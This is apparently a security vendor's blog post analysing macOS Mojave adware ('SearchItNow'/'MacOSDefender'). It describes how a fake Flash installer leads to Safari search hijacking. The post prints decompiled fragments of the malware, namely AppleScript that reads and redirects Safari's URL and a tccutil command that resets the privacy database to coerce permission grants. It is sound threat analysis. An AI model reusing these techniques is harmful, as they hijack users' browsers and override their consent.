Hijacking Safari; by any means necessary.

Author: Daniel Elkabes, Researcher @AiroAV (Airo Security)

December 15th, 2018

Airo Labs Research uncovered ‘Searchitnow’ and ‘MacOSDefender’: Adware designed specifically to evade new security measures in macOS Mojave.

Adware is one of the most widespread families around, using malware tactics to push unwanted apps, software, and ads to monetize on users. Despite common belief, Mac OS is not immune to all Malware and Adware out there. Macs are vulnerable and Adware (or other threats) are not always easy to locate, identify or get rid of. At Airo labs, we encounter new techniques almost every week to hijack users’ browsers, permissions, settings and/or search engine.

Security updates on Apple’s latest macOS release “Mojave”, have challenged attackers to come up with new successful methods to misuse their users and hijacking their browsers, systems, and permissions.

Prior to Mojave’s release, the most common method for spreading Adware that hijacks users’  Safari’s settings and content, was by installing a malicious browser extension (Safariextz). Post-Mojave release, Safari has ceased to support local loading of such Safari extensions, and now only allow installation of extension from the store. This means that Adware attackers had to find alternative ways into our Macs and browsers.

From SearchItNow to MacOSDefender

The “SearchItNow” Adware (our internal name for this malware family), is very common and widespread among Mac users. Like many other Adware types out there, it all started by luring the user into the installation of a (fake) “Adobe Flash Player”, while surfing the web:

App-Bundle as a part of a DMG

Once the ‘update’ button had been clicked, an installer was downloaded and triggered:

The set-up flow (main agent) indicates a “Flash Player” installation.  Sharp observers among us may notice that the (default) “express installation” includes the EULA and “approval” of 4 different products; none of which were the application the user intended to  install.

Installer Bundle GUI

The installer sets up its environment by implementing its main agent (with a LaunchAgent), and asking for the accessibility permission which is now followed by a new os alert:

System preferences popup

Accessibility permission screen

Once given, this permission allows the main agent (installer) of the Adware to run its own scripts and system commands on the machine. By having the permissions and authorizations of the user, the main agent is now free to execute its scripts in the background and hijack our Chrome and FireFox homepages, create new tabs and change default search engines.

At this point, the installation process of our Adware is similar to the methods used before the Mojave updates. The unattentive researcher might opt to dismiss this sample into the ‘nothing new’ bin and move along. But not us.

Because a few hours after the installation, unbeknownst to the user, the agent silently downloads in the background another application from a static URL (http://www.<reducted>.pw/static/apps/20.zip). The app contains “MacOSDefender” Mach-O, “Executor” Mach-O and “com.company.engine.plist” Plist (LaunchAgent).

The content the app downloaded unknowingly to the user

Once this app is executed by the main installer’s agent, the user will get the following alert, popping up out of nowhere:

Apple Access request popup

This is one of the new permission dialogs in Mojave, allowing “MacOSDefender” to take control of  Safari, mainly by using AppleScript.

MacOSDefender (Mach-O)

Digging deeper into this Adware, we noticed that the “MacOSDefender” process is constantly running in the background. Upon launching a Safari session, we saw that the “Executor” process was started and quit once every few seconds. Looking deeper into “MacOSDefedner” Mach-o we are able to verify the same agent, responsible for  executing the “Executor”:

var_B0 = [rax pathForResource:@"Executor" ofType:@""];
var_178 = [NSTask launchedTaskWithLaunchPath:var_C8 arguments:rax]

Before running “Executor” it checks if a Safari window is open:

-(void)checkForSafariWindow {
	-[AppleScriptEnabler checkForSafariWindow]", @"app returned is 
	true.", r9, stack[-120]);
	[var_8 updateWindowList];, 
	-[AppleScriptEnabler checkForSafariWindow]", @"Extension window
 	Not Found...", r9, stack[-120]);

Attaching to MacOSDefender process, verified “Executor” is now running in a loop for as long as Safari is open:

Debugging MacOSDefender process

What happens if the user was smart enough not to authorize the “MacOsDefender” permission to control safari? In this case, it will reset the entire privacy database for all of our existing apps.

system("tccutil reset \"AppleEvents\"");

Then, it will try to execute “MacOSDefender” and ask for permission over and over again, until the user will finally click that authorization button to end the constant nagging and frustration.

Executor (Mach-O)

As the name may imply, this is the code that executes the ‘search hijacking’, as you can see in this GIF below.

The user searches for “123” in the search bar of Safari and actually gets the Google result page. But a few moments later, they are being redirected through “SearchItNow.global.ssl.fastly.net” to Bing search result of “123”.

Search Hijacking gif

How this is being done? Remember that permission we gave MacOSDefender.app to run AppleScript on Safari? Well, further inspection of “Executor”, revealed a function that explains the “hijacking” mechanism. The process works as follows:

  • It starts by checking if safari app is open:
var_A0 = [[NSRunningApplication runningApplicationsWithBundleIdentifier:@"com.apple.Safari"] retain];
    if ([var_A0 count] <= 0x0)
  • If Safari is open, then the Adware will run this AppleScript:
"tell application \"Safari\" to return URL of front document as string"

Pretty straightforward, it will get the current page URL in Safari.

  • Then, the Adware checks if the URL is a Google search page:
if (([var_E0 rangeOfString:@".google."] != 0x7fffffffffffffff) && ([var_E0 rangeOfString:@"search?"] != 0x7fffffffffffffff)) {
  • If so, the Adware takes the search query from the query string parameter (“q”), which is what we searched for. (For example: search?q=123):
var_110 = [rax isEqualToString:@"q"];
  • Then it creates a new query URL with their domain “SearchItNow”:
var_160 = [_searchEngineForQuery(var_110) retain];
var_80 = [[NSString stringWithFormat:@"https://SearchItNow.global.ssl.fastly.net/v1/hostedsearch?aid=%@&data=%@&keyword=%@&apso=1", var_70, rax, var_10] retain];
  • And finally it changes the page and redirects Safari to that URL:
"tell application \"Safari\" to set the URL of front document to \"%@\"", var_160];
Let’s Summarize

So, what’s the fuzz all about?? Let us simplify it for you and break it down to a 60 seconds read:

You come across an ad, popping as a new-tab urging you to install or update an Adobe Flash Player.
You download and execute the installer, which then installs some additional 3rd party apps that you didn’t ask for, or weren’t even aware of. A few hours later, a second installer agent is installed and being used to hijack your search engine, search results, homepage, and new-tab. The agents run constantly and silently in the background, slowing down your Mac and consuming OS resources. Even if you do decide to uninstall it, some of these apps were separately and silently installed, so you wouldn’t even know you should be looking for them.

Don’t be mistaken. The results that users see are indeed those annoying ads or some products they didn’t ask for (hence, Adware). But the means and the tactics used to do so are those of a not less than a malware. Creating vulnerabilities that could easily be exploited by any malicious attackers out there.

Seems like this new browser hijacking method was done as a quick patch, to probably meet some deadline of the new macOS version release. But even if it looks terrible and done somewhat sloppy, it still gets the job done, and it is annoying as hell.


Subscribe to our blog

Get Airo

Try Airo AV and Airo Web Protection

Try Airo